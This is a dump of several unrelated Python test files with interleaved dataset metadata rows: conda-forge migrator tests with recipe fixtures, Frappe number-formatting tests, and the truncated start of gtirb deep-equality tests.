version: {{ version }}
source:
fn: {{ name }}-{{ version }}.tar.gz
url: https://github.com/xpdAcq/{{ name }}/releases/download/{{ version }}/{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
noarch: python
number: 1
script: python -m pip install --no-deps --ignore-installed .
requirements:
host:
- python >=3
- pip
run:
- python >=3
- numpy
- scipy
- matplotlib
- pyyaml
- scikit-beam
- pyfai
- pyxdameraulevenshtein
- xray-vision
- databroker
- bluesky
- streamz_ext
- xpdsim
- shed
- xpdview
- ophyd
- xpdconf
test:
imports:
- xpdan
- xpdan.pipelines
about:
home: http://github.com/xpdAcq/xpdAn
license: BSD-3-Clause
license_family: BSD
license_file: LICENSE
summary: 'Analysis Tools for XPD'
doc_url: http://xpdacq.github.io/xpdAn/
dev_url: http://github.com/xpdAcq/xpdAn
extra:
recipe-maintainers:
- CJ-Wright
""" # noqa
sample_noarch_space = """
{# sample_noarch_space #}
{% set name = "xpdan" %}
{% set version = "0.3.3" %}
{% set sha256 = "3f1a84f35471aa8e383da3cf4436492d0428da8ff5b02e11074ff65d400dd076" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
fn: {{ name }}-{{ version }}.tar.gz
url: https://github.com/xpdAcq/{{ name }}/releases/download/{{ version }}/{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
number: 0
script: python -m pip install --no-deps --ignore-installed .
requirements:
build:
- python >=3
- pip
run:
- python >=3
- numpy
- scipy
- matplotlib
- pyyaml
- scikit-beam
- pyfai
- pyxdameraulevenshtein
- xray-vision
- databroker
- bluesky
- streamz_ext
- xpdsim
- shed
- xpdview
- ophyd
- xpdconf
test:
imports:
- xpdan
- xpdan.pipelines
about:
home: http://github.com/xpdAcq/xpdAn
license: BSD-3-Clause
license_family: BSD
license_file: LICENSE
summary: 'Analysis Tools for XPD'
doc_url: http://xpdacq.github.io/xpdAn/
dev_url: http://github.com/xpdAcq/xpdAn
extra:
recipe-maintainers:
- CJ-Wright
""" # noqa
updated_noarch_space = """
{# updated_noarch_space #}
{% set name = "xpdan" %}
{% set version = "0.3.3" %}
{% set sha256 = "3f1a84f35471aa8e383da3cf4436492d0428da8ff5b02e11074ff65d400dd076" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
fn: {{ name }}-{{ version }}.tar.gz
url: https://github.com/xpdAcq/{{ name }}/releases/download/{{ version }}/{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
noarch: python
number: 1
script: python -m pip install --no-deps --ignore-installed .
requirements:
host:
- python >=3
- pip
run:
- python >=3
- numpy
- scipy
- matplotlib
- pyyaml
- scikit-beam
- pyfai
- pyxdameraulevenshtein
- xray-vision
- databroker
- bluesky
- streamz_ext
- xpdsim
- shed
- xpdview
- ophyd
- xpdconf
test:
imports:
- xpdan
- xpdan.pipelines
about:
home: http://github.com/xpdAcq/xpdAn
license: BSD-3-Clause
license_family: BSD
license_file: LICENSE
summary: 'Analysis Tools for XPD'
doc_url: http://xpdacq.github.io/xpdAn/
dev_url: http://github.com/xpdAcq/xpdAn
extra:
recipe-maintainers:
- CJ-Wright
""" # noqa
sample_pinning = """
{# sample_pinning #}
{% set version = "2.44_01" %}
package:
name: perl-xml-parser
version: {{ version }}
source:
fn: XML-Parser-{{ version }}.tar.gz
url: https://cpan.metacpan.org/authors/id/T/TO/TODDR/XML-Parser-{{ version }}.tar.gz
sha256: 5310ea5c8c707f387589bba8934ab9112463a452f828adf2755792d968b9ac7e
build:
number: 0
skip: True # [win]
requirements:
build:
- toolchain3
- perl 5.22.2.1
- expat 2.2.*
run:
- perl 5.22.2.1
- perl-xml-parser
- expat 2.2.*
test:
imports:
- XML::Parser
- XML::Parser::Expat
- XML::Parser::Style::Debug
- XML::Parser::Style::Objects
- XML::Parser::Style::Stream
- XML::Parser::Style::Subs
- XML::Parser::Style::Tree
about:
home: https://metacpan.org/pod/XML::Parser
# According to http://dev.perl.org/licenses/ Perl5 is licensed either under
# GPL v1 or later or the Artistic License
license: GPL-3.0
license_family: GPL
summary: A perl module for parsing XML documents
extra:
recipe-maintainers:
- kynan
"""
updated_perl = """
{# updated_perl #}
{% set version = "2.44_01" %}
package:
name: perl-xml-parser
version: {{ version }}
source:
fn: XML-Parser-{{ version }}.tar.gz
url: https://cpan.metacpan.org/authors/id/T/TO/TODDR/XML-Parser-{{ version }}.tar.gz
sha256: 5310ea5c8c707f387589bba8934ab9112463a452f828adf2755792d968b9ac7e
build:
number: 1
skip: True # [win]
requirements:
build:
- toolchain3
- perl
- expat 2.2.*
run:
- perl
- perl-xml-parser
- expat 2.2.*
test:
imports:
- XML::Parser
- XML::Parser::Expat
- XML::Parser::Style::Debug
- XML::Parser::Style::Objects
- XML::Parser::Style::Stream
- XML::Parser::Style::Subs
- XML::Parser::Style::Tree
about:
home: https://metacpan.org/pod/XML::Parser
# According to http://dev.perl.org/licenses/ Perl5 is licensed either under
# GPL v1 or later or the Artistic License
license: GPL-3.0
license_family: GPL
summary: A perl module for parsing XML documents
extra:
recipe-maintainers:
- kynan
"""
updated_pinning = """
{# updated_pinning #}
{% set version = "2.44_01" %}
package:
name: perl-xml-parser
version: {{ version }}
source:
fn: XML-Parser-{{ version }}.tar.gz
url: https://cpan.metacpan.org/authors/id/T/TO/TODDR/XML-Parser-{{ version }}.tar.gz
sha256: 5310ea5c8c707f387589bba8934ab9112463a452f828adf2755792d968b9ac7e
build:
number: 1
skip: True # [win]
requirements:
build:
- toolchain3
- perl
- expat
run:
- perl
- perl-xml-parser
- expat
test:
imports:
- XML::Parser
- XML::Parser::Expat
- XML::Parser::Style::Debug
- XML::Parser::Style::Objects
- XML::Parser::Style::Stream
- XML::Parser::Style::Subs
- XML::Parser::Style::Tree
about:
home: https://metacpan.org/pod/XML::Parser
# According to http://dev.perl.org/licenses/ Perl5 is licensed either under
# GPL v1 or later or the Artistic License
license: GPL-3.0
license_family: GPL
summary: A perl module for parsing XML documents
extra:
recipe-maintainers:
- kynan
"""
sample_blas = """
{# sample_blas #}
{% set version = "1.2.1" %}
{% set variant = "openblas" %}
package:
name: scipy
version: {{ version }}
source:
url: https://github.com/scipy/scipy/archive/v{{ version }}.tar.gz
sha256: d4b9c1c1dee37ffd1653fd62ea52587212d3b1570c927f16719fd7c4077c0d0a
build:
number: 0
skip: true # [win]
features:
- blas_{{ variant }}
requirements:
build:
- {{ compiler('fortran') }}
- {{ compiler('c') }}
- {{ compiler('cxx') }}
host:
- python
- setuptools
- cython
- blas 1.1 {{ variant }}
- openblas
- numpy
run:
- python
- blas 1.1 {{ variant }}
- openblas
- {{ pin_compatible('numpy') }}
test:
requires:
- pytest
- mpmath
"""
updated_blas = """
{# updated_blas #}
{% set version = "1.2.1" %}
package:
name: scipy
version: {{ version }}
source:
url: https://github.com/scipy/scipy/archive/v{{ version }}.tar.gz
sha256: d4b9c1c1dee37ffd1653fd62ea52587212d3b1570c927f16719fd7c4077c0d0a
build:
number: 1
skip: true # [win]
features:
requirements:
build:
- {{ compiler('fortran') }}
- {{ compiler('c') }}
- {{ compiler('cxx') }}
host:
- libblas
- libcblas
- python
- setuptools
- cython
- numpy
run:
- python
- {{ pin_compatible('numpy') }}
test:
requires:
- pytest
- mpmath
"""
sample_matplotlib = """
{% set version = "0.9" %}
package:
name: viscm
version: {{ version }}
source:
url: https://pypi.io/packages/source/v/viscm/viscm-{{ version }}.tar.gz
sha256: c770e4b76f726e653d2b7c2c73f71941a88de6eb47ccf8fb8e984b55562d05a2
build:
number: 0
noarch: python
script: python -m pip install --no-deps --ignore-installed .
requirements:
host:
- python
- pip
- numpy
run:
- python
- numpy
- matplotlib
- colorspacious
test:
imports:
- viscm
about:
home: https://github.com/bids/viscm
license: MIT
license_file: LICENSE
license_family: MIT
# license_file: '' we need to an issue upstream to get a license in the source dist.
summary: A colormap tool
extra:
recipe-maintainers:
- kthyng
"""
sample_matplotlib_correct = """
{% set version = "0.9" %}
package:
name: viscm
version: {{ version }}
source:
url: https://pypi.io/packages/source/v/viscm/viscm-{{ version }}.tar.gz
sha256: c770e4b76f726e653d2b7c2c73f71941a88de6eb47ccf8fb8e984b55562d05a2
build:
number: 1
noarch: python
script: python -m pip install --no-deps --ignore-installed .
requirements:
host:
- python
- pip
- numpy
run:
- python
- numpy
- matplotlib-base
- colorspacious
test:
imports:
- viscm
about:
home: https://github.com/bids/viscm
license: MIT
license_file: LICENSE
license_family: MIT
# license_file: '' we need to an issue upstream to get a license in the source dist.
summary: A colormap tool
extra:
recipe-maintainers:
- kthyng
"""
js = JS()
version = Version(set())
# compiler = Compiler()
noarch = Noarch()
noarchr = NoarchR()
perl = Pinning(removals={"perl"})
pinning = Pinning()
class _Rebuild(NoFilter, Rebuild):
pass
rebuild = _Rebuild(name="rebuild", cycles=[])
class _BlasRebuild(NoFilter, BlasRebuild):
pass
blas_rebuild = _BlasRebuild(cycles=[])
matplotlib = Replacement(
old_pkg="matplotlib",
new_pkg="matplotlib-base",
rationale=(
"Unless you need `pyqt`, recipes should depend only on " "`matplotlib-base`."
),
pr_limit=5,
)
G = nx.DiGraph()
G.add_node("conda", reqs=["python"])
env = builtins.__xonsh__.env # type: ignore
env["GRAPH"] = G
env["CIRCLE_BUILD_URL"] = "hi world"
def run_test_migration(
m,
inp,
output,
kwargs,
prb,
mr_out,
should_filter=False,
tmpdir=None,
):
mm_ctx = MigratorSessionContext(
graph=G,
smithy_version="",
pinning_version="",
github_username="",
github_password="",
circle_build_url=env["CIRCLE_BUILD_URL"],
)
m_ctx = MigratorContext(mm_ctx, m)
m.bind_to_ctx(m_ctx)
if mr_out:
mr_out.update(bot_rerun=False)
with open(os.path.join(tmpdir, "meta.yaml"), "w") as f:
f.write(inp)
# read the conda-forge.yml
if os.path.exists(os.path.join(tmpdir, "..", "conda-forge.yml")):
with open(os.path.join(tmpdir, "..", "conda-forge.yml")) as fp:
cf_yml = fp.read()
else:
cf_yml = "{}"
# Load the meta.yaml (this is done in the graph)
try:
name = parse_meta_yaml(inp)["package"]["name"]
except Exception:
name = "blah"
pmy = populate_feedstock_attributes(name, {}, inp, cf_yml)
# these are here for legacy migrators
pmy["version"] = pmy["meta_yaml"]["package"]["version"]
pmy["req"] = set()
for k in ["build", "host", "run"]:
req = pmy["meta_yaml"].get("requirements", {}) or {}
_set = req.get(k) or set()
pmy["req"] |= set(_set)
pmy["raw_meta_yaml"] = inp
pmy.update(kwargs)
assert m.filter(pmy) is should_filter
if should_filter:
return pmy
m.run_pre_piggyback_migrations(
tmpdir,
pmy,
hash_type=pmy.get("hash_type", "sha256"),
)
mr = m.migrate(tmpdir, pmy, hash_type=pmy.get("hash_type", "sha256"))
m.run_post_piggyback_migrations(
tmpdir,
pmy,
hash_type=pmy.get("hash_type", "sha256"),
)
assert mr_out == mr
if not mr:
return pmy
pmy.update(PRed=[frozen_to_json_friendly(mr)])
with open(os.path.join(tmpdir, "meta.yaml")) as f:
actual_output = f.read()
# strip jinja comments
pat = re.compile(r"{#.*#}")
actual_output = pat.sub("", actual_output)
output = pat.sub("", output)
assert actual_output == output
if isinstance(m, Compiler):
assert m.messages in m.pr_body(None)
# TODO: fix subgraph here (need this to be xsh file)
elif isinstance(m, Version):
pass
elif isinstance(m, Rebuild):
return pmy
else:
assert prb in m.pr_body(None)
assert m.filter(pmy) is True
return pmy
@pytest.mark.skip
def test_js_migrator(tmpdir):
run_test_migration(
m=js,
inp=sample_js,
output=correct_js,
kwargs={},
prb="Please merge the PR only after the tests have passed.",
mr_out={"migrator_name": "JS", "migrator_version": JS.migrator_version},
tmpdir=tmpdir,
)
@pytest.mark.skip
def test_js_migrator2(tmpdir):
run_test_migration(
m=js,
inp=sample_js2,
output=correct_js2, # noqa
kwargs={},
prb="Please merge the PR only after the tests have passed.",
mr_out={"migrator_name": "JS", "migrator_version": JS.migrator_version},
tmpdir=tmpdir,
)
@pytest.mark.skip
def test_cb3(tmpdir):
run_test_migration(
m=compiler,
inp=sample_cb3,
output=correct_cb3,
kwargs={},
prb="N/A",
mr_out={
"migrator_name": "Compiler",
"migrator_version": Compiler.migrator_version,
},
tmpdir=tmpdir,
)
def test_noarch(tmpdir):
# It seems this injects some bad state somewhere, mostly because it isn't
# valid yaml
run_test_migration(
m=noarch,
inp=sample_noarch,
output=updated_noarch,
kwargs={
"feedstock_name": "xpdan",
"req": [
"python",
"pip",
"numpy",
"scipy",
"matplotlib",
"pyyaml",
"scikit-beam",
"pyfai",
"pyxdameraulevenshtein",
"xray-vision",
"databroker",
"bluesky",
"streamz_ext",
"xpdsim",
"shed",
"xpdview",
"ophyd",
"xpdconf",
],
},
prb="I think this feedstock could be built with noarch.\n"
"This means that the package only needs to be built "
"once, drastically reducing CI usage.\n",
mr_out={"migrator_name": "Noarch", "migrator_version": Noarch.migrator_version},
tmpdir=tmpdir,
)
def test_noarch_space(tmpdir):
# It seems this injects some bad state somewhere, mostly because it isn't
# valid yaml
run_test_migration(
m=noarch,
inp=sample_noarch_space,
output=updated_noarch_space,
kwargs={
"feedstock_name": "xpdan",
"req": [
"python",
"pip",
"numpy",
"scipy",
"matplotlib",
"pyyaml",
"scikit-beam",
"pyfai",
"pyxdameraulevenshtein",
"xray-vision",
"databroker",
"bluesky",
"streamz_ext",
"xpdsim",
"shed",
"xpdview",
"ophyd",
"xpdconf",
],
},
prb="I think this feedstock could be built with noarch.\n"
"This means that the package only needs to be built "
"once, drastically reducing CI usage.\n",
mr_out={"migrator_name": "Noarch", "migrator_version": Noarch.migrator_version},
tmpdir=tmpdir,
)
def test_noarch_space_python(tmpdir):
run_test_migration(
m=noarch,
inp=sample_noarch_space,
output=updated_noarch_space,
kwargs={"feedstock_name": "python"},
prb="I think this feedstock could be built with noarch.\n"
"This means that the package only needs to be built "
"once, drastically reducing CI usage.\n",
mr_out={"migrator_name": "Noarch", "migrator_version": Noarch.migrator_version},
should_filter=True,
tmpdir=tmpdir,
)
def test_perl(tmpdir):
run_test_migration(
m=perl,
inp=sample_pinning,
output=updated_perl,
kwargs={"req": {"toolchain3", "perl", "expat"}},
prb="I noticed that this recipe has version pinnings that may not be needed.",
mr_out={
"migrator_name": "Pinning",
"migrator_version": Pinning.migrator_version,
},
tmpdir=tmpdir,
)
def test_perl_pinning(tmpdir):
run_test_migration(
m=pinning,
inp=sample_pinning,
output=updated_pinning,
kwargs={"req": {"toolchain3", "perl", "expat"}},
prb="perl: 5.22.2.1",
mr_out={
"migrator_name": "Pinning",
"migrator_version": Pinning.migrator_version,
},
tmpdir=tmpdir,
)
def test_nnoarch_r(tmpdir):
run_test_migration(
m=noarchr,
inp=sample_r_base,
output=updated_r_base,
kwargs={"feedstock_name": "r-stabledist"},
prb="I think this feedstock could be built with noarch",
mr_out={
"migrator_name": "NoarchR",
"migrator_version": noarchr.migrator_version,
},
tmpdir=tmpdir,
)
def test_rebuild_r(tmpdir):
run_test_migration(
m=rebuild,
inp=sample_r_base2,
output=updated_r_base2,
kwargs={"feedstock_name": "r-stabledist"},
prb="It is likely this feedstock needs to be rebuilt.",
mr_out={
"migrator_name": "_Rebuild",
"migrator_version": rebuild.migrator_version,
"name": "rebuild",
},
tmpdir=tmpdir,
)
def test_nnoarch_r_licenses(tmpdir):
run_test_migration(
m=noarchr,
inp=sample_r_licenses_noarch,
output=updated_r_licenses_noarch,
kwargs={"feedstock_name": "r-stabledist"},
prb="I think this feedstock could be built with noarch",
mr_out={
"migrator_name": "NoarchR",
"migrator_version": noarchr.migrator_version,
},
tmpdir=tmpdir,
)
def test_blas_rebuild(tmpdir):
run_test_migration(
m=blas_rebuild,
inp=sample_blas,
output=updated_blas,
kwargs={"feedstock_name": "scipy"},
prb="This PR has been triggered in an effort to update for new BLAS scheme.",
mr_out={
"migrator_name": "_BlasRebuild",
"migrator_version": blas_rebuild.migrator_version,
"name": "blas2",
},
tmpdir=tmpdir,
)
def test_generic_replacement(tmpdir):
run_test_migration(
m=matplotlib,
inp=sample_matplotlib,
output=sample_matplotlib_correct,
kwargs={},
prb="I noticed that this recipe depends on `matplotlib` instead of ",
mr_out={
"migrator_name": "Replacement",
"migrator_version": matplotlib.migrator_version,
"name": "matplotlib-to-matplotlib-base",
},
tmpdir=tmpdir,
)
| 22.982759 | 97 | 0.62067 | 5,358 | 45,322 | 5.128779 | 0.095185 | 0.021616 | 0.021834 | 0.033188 | 0.87682 | 0.858297 | 0.843231 | 0.827547 | 0.811208 | 0.799818 | 0 | 0.050289 | 0.232183 | 45,322 | 1,971 | 98 | 22.994419 | 0.739389 | 0.014607 | 0 | 0.835077 | 0 | 0.036923 | 0.750431 | 0.106859 | 0 | 0 | 0 | 0.000507 | 0.006769 | 1 | 0.011077 | false | 0.004308 | 0.014154 | 0.000615 | 0.031385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
160ea33378421471ae231d57bab755872108e9ea | 4,334 | py | Python | frappe/tests/test_fmt_money.py | ssuda777/frappe | d3f3df2ce15154aecc1d9d6d07d947e72c2e8c6e | [
"MIT"
] | 1 | 2021-12-18T18:37:29.000Z | 2021-12-18T18:37:29.000Z | frappe/tests/test_fmt_money.py | JMBodz/frappe | eb218a06d1cbfc3a8f1cc00ba8dac2c927d2f71d | [
"MIT"
] | 3 | 2021-02-27T11:50:14.000Z | 2021-05-03T06:48:49.000Z | frappe/tests/test_fmt_money.py | JMBodz/frappe | eb218a06d1cbfc3a8f1cc00ba8dac2c927d2f71d | [
"MIT"
] | 2 | 2021-09-02T09:51:55.000Z | 2021-09-07T04:55:42.000Z | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
import frappe
from frappe.utils import fmt_money
import unittest
class TestFmtMoney(unittest.TestCase):
def test_standard(self):
frappe.db.set_default("number_format", "#,###.##")
self.assertEqual(fmt_money(100), "100.00")
self.assertEqual(fmt_money(1000), "1,000.00")
self.assertEqual(fmt_money(10000), "10,000.00")
self.assertEqual(fmt_money(100000), "100,000.00")
self.assertEqual(fmt_money(1000000), "1,000,000.00")
self.assertEqual(fmt_money(10000000), "10,000,000.00")
self.assertEqual(fmt_money(100000000), "100,000,000.00")
self.assertEqual(fmt_money(1000000000), "1,000,000,000.00")
def test_negative(self):
frappe.db.set_default("number_format", "#,###.##")
self.assertEqual(fmt_money(-100), "-100.00")
self.assertEqual(fmt_money(-1000), "-1,000.00")
self.assertEqual(fmt_money(-10000), "-10,000.00")
self.assertEqual(fmt_money(-100000), "-100,000.00")
self.assertEqual(fmt_money(-1000000), "-1,000,000.00")
self.assertEqual(fmt_money(-10000000), "-10,000,000.00")
self.assertEqual(fmt_money(-100000000), "-100,000,000.00")
self.assertEqual(fmt_money(-1000000000), "-1,000,000,000.00")
def test_decimal(self):
frappe.db.set_default("number_format", "#.###,##")
self.assertEqual(fmt_money(-100), "-100,00")
self.assertEqual(fmt_money(-1000), "-1.000,00")
self.assertEqual(fmt_money(-10000), "-10.000,00")
self.assertEqual(fmt_money(-100000), "-100.000,00")
self.assertEqual(fmt_money(-1000000), "-1.000.000,00")
self.assertEqual(fmt_money(-10000000), "-10.000.000,00")
self.assertEqual(fmt_money(-100000000), "-100.000.000,00")
self.assertEqual(fmt_money(-1000000000), "-1.000.000.000,00")
def test_lacs(self):
frappe.db.set_default("number_format", "#,##,###.##")
self.assertEqual(fmt_money(100), "100.00")
self.assertEqual(fmt_money(1000), "1,000.00")
self.assertEqual(fmt_money(10000), "10,000.00")
self.assertEqual(fmt_money(100000), "1,00,000.00")
self.assertEqual(fmt_money(1000000), "10,00,000.00")
self.assertEqual(fmt_money(10000000), "1,00,00,000.00")
self.assertEqual(fmt_money(100000000), "10,00,00,000.00")
self.assertEqual(fmt_money(1000000000), "1,00,00,00,000.00")
def test_no_precision(self):
frappe.db.set_default("number_format", "#,###")
self.assertEqual(fmt_money(0.3), "0")
self.assertEqual(fmt_money(100.3), "100")
self.assertEqual(fmt_money(1000.3), "1,000")
self.assertEqual(fmt_money(10000.3), "10,000")
self.assertEqual(fmt_money(-0.3), "0")
self.assertEqual(fmt_money(-100.3), "-100")
self.assertEqual(fmt_money(-1000.3), "-1,000")
def test_currency_precision(self):
frappe.db.set_default("currency_precision", "4")
frappe.db.set_default("number_format", "#,###.##")
self.assertEqual(fmt_money(100), "100.00")
self.assertEqual(fmt_money(1000), "1,000.00")
self.assertEqual(fmt_money(10000), "10,000.00")
self.assertEqual(fmt_money(100000), "100,000.00")
self.assertEqual(fmt_money(1000000), "1,000,000.00")
self.assertEqual(fmt_money(10000000), "10,000,000.00")
self.assertEqual(fmt_money(100000000), "100,000,000.00")
self.assertEqual(fmt_money(1000000000), "1,000,000,000.00")
self.assertEqual(fmt_money(100.23), "100.23")
self.assertEqual(fmt_money(1000.456), "1,000.456")
self.assertEqual(fmt_money(10000.7890), "10,000.789")
self.assertEqual(fmt_money(100000.1234), "100,000.1234")
self.assertEqual(fmt_money(1000000.3456), "1,000,000.3456")
self.assertEqual(fmt_money(10000000.3344567), "10,000,000.3345")
self.assertEqual(fmt_money(100000000.37827268), "100,000,000.3783")
self.assertEqual(fmt_money(1000000000.2718272637), "1,000,000,000.2718")
frappe.db.set_default("currency_precision", "")
def test_currency_precision_de_format(self):
frappe.db.set_default("currency_precision", "4")
frappe.db.set_default("number_format", "#.###,##")
self.assertEqual(fmt_money(100), "100,00")
self.assertEqual(fmt_money(1000), "1.000,00")
self.assertEqual(fmt_money(10000), "10.000,00")
self.assertEqual(fmt_money(100000), "100.000,00")
self.assertEqual(fmt_money(100.23), "100,23")
self.assertEqual(fmt_money(1000.456), "1.000,456")
frappe.db.set_default("currency_precision", "")
if __name__=="__main__":
frappe.connect()
unittest.main() | 44.680412 | 74 | 0.716659 | 656 | 4,334 | 4.57622 | 0.106707 | 0.165223 | 0.365756 | 0.467355 | 0.862092 | 0.790806 | 0.761492 | 0.733511 | 0.708528 | 0.708528 | 0 | 0.225038 | 0.080295 | 4,334 | 97 | 75 | 44.680412 | 0.528098 | 0.02192 | 0 | 0.325581 | 0 | 0 | 0.203682 | 0 | 0 | 0 | 0 | 0 | 0.709302 | 1 | 0.081395 | false | 0 | 0.034884 | 0 | 0.127907 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
1638d05840f0ecce26ed7ab6dcf4162144176902 | 41,433 | py | Python | python/tests/test_deep_eq.py | clayne/gtirb | df9bf69537c36136d40fbff98588df37b8c5875f | [
"MIT"
] | 230 | 2018-10-14T11:07:14.000Z | 2022-03-31T21:25:43.000Z | python/tests/test_deep_eq.py | clayne/gtirb | df9bf69537c36136d40fbff98588df37b8c5875f | [
"MIT"
] | 33 | 2018-10-25T15:48:48.000Z | 2022-03-25T03:10:13.000Z | python/tests/test_deep_eq.py | clayne/gtirb | df9bf69537c36136d40fbff98588df37b8c5875f | [
"MIT"
] | 33 | 2018-10-14T11:07:17.000Z | 2022-03-31T16:12:00.000Z | import unittest
import uuid
import gtirb
class DeepEqTest(unittest.TestCase):
def test_code_block(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
b1 = gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id1)
b2 = gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id1)
self.assertTrue(b1.deep_eq(b2))
b2 = gtirb.CodeBlock(size=5, decode_mode=2, offset=3, uuid=id1)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.CodeBlock(size=1, decode_mode=5, offset=3, uuid=id1)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.CodeBlock(size=1, decode_mode=2, offset=5, uuid=id1)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id2)
self.assertFalse(b1.deep_eq(b2))
def test_data_block(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
b1 = gtirb.DataBlock(size=1, offset=3, uuid=id1)
b2 = gtirb.DataBlock(size=1, offset=3, uuid=id1)
self.assertTrue(b1.deep_eq(b2))
b2 = gtirb.DataBlock(size=5, offset=3, uuid=id1)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.DataBlock(size=1, offset=5, uuid=id1)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.DataBlock(size=1, offset=3, uuid=id2)
self.assertFalse(b1.deep_eq(b2))
def test_proxy_blocks(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
b1 = gtirb.ProxyBlock(uuid=id1)
b2 = gtirb.ProxyBlock(uuid=id1)
self.assertTrue(b1.deep_eq(b2))
b2 = gtirb.ProxyBlock(uuid=id2)
self.assertFalse(b1.deep_eq(b2))
def test_symbol(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
s1 = gtirb.Symbol(name="name", payload=None, uuid=id1)
s2 = gtirb.Symbol(name="name", payload=None, uuid=id1)
self.assertTrue(s1.deep_eq(s2))
s1 = gtirb.Symbol(name="name", payload=5, uuid=id1)
s2 = gtirb.Symbol(name="name", payload=5, uuid=id1)
self.assertTrue(s1.deep_eq(s2))
s1 = gtirb.Symbol(
name="name",
payload=gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id1),
uuid=id1,
)
s2 = gtirb.Symbol(
name="name",
payload=gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id1),
uuid=id1,
)
self.assertTrue(s1.deep_eq(s2))
s1 = gtirb.Symbol(name="name1", payload=None, uuid=id1)
s2 = gtirb.Symbol(name="name2", payload=None, uuid=id1)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.Symbol(name="name", payload=None, uuid=id1)
s2 = gtirb.Symbol(name="name", payload=5, uuid=id1)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.Symbol(
name="name",
payload=gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id1),
uuid=id1,
)
s2 = gtirb.Symbol(
name="name",
payload=gtirb.CodeBlock(size=2, decode_mode=2, offset=3, uuid=id1),
uuid=id1,
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.Symbol(name="name", payload=None, uuid=id1)
s2 = gtirb.Symbol(name="name", payload=None, uuid=id2)
self.assertFalse(s1.deep_eq(s2))
def test_sym_exprs(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
# SymAddrConst
s1 = gtirb.SymAddrConst(
offset=1,
symbol=gtirb.Symbol(name="name", payload=None, uuid=id1),
attributes={gtirb.SymbolicExpression.Attribute.Part1},
)
s2 = gtirb.SymAddrConst(
offset=1,
symbol=gtirb.Symbol(name="name", payload=None, uuid=id1),
attributes={gtirb.SymbolicExpression.Attribute.Part1},
)
self.assertTrue(s1.deep_eq(s2))
s1 = gtirb.SymAddrConst(
offset=1, symbol=gtirb.Symbol(name="name", payload=None, uuid=id1)
)
s2 = gtirb.SymAddrConst(
offset=2, symbol=gtirb.Symbol(name="name", payload=None, uuid=id1)
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.SymAddrConst(
offset=1, symbol=gtirb.Symbol(name="name1", payload=None, uuid=id1)
)
s2 = gtirb.SymAddrConst(
offset=1, symbol=gtirb.Symbol(name="name2", payload=None, uuid=id1)
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.SymAddrConst(
offset=1,
symbol=gtirb.Symbol(name="name", payload=None, uuid=id1),
attributes={gtirb.SymbolicExpression.Attribute.Part1},
)
s2 = gtirb.SymAddrConst(
offset=1, symbol=gtirb.Symbol(name="name", payload=None, uuid=id1),
)
self.assertFalse(s1.deep_eq(s2))
# SymAddrAddr
s1 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
attributes={gtirb.SymbolicExpression.Attribute.Part1},
)
s2 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
attributes={gtirb.SymbolicExpression.Attribute.Part1},
)
self.assertTrue(s1.deep_eq(s2))
s1 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
s2 = gtirb.SymAddrAddr(
offset=2,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
s2 = gtirb.SymAddrAddr(
offset=1,
scale=4,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
s2 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name3", payload=None, uuid=id1),
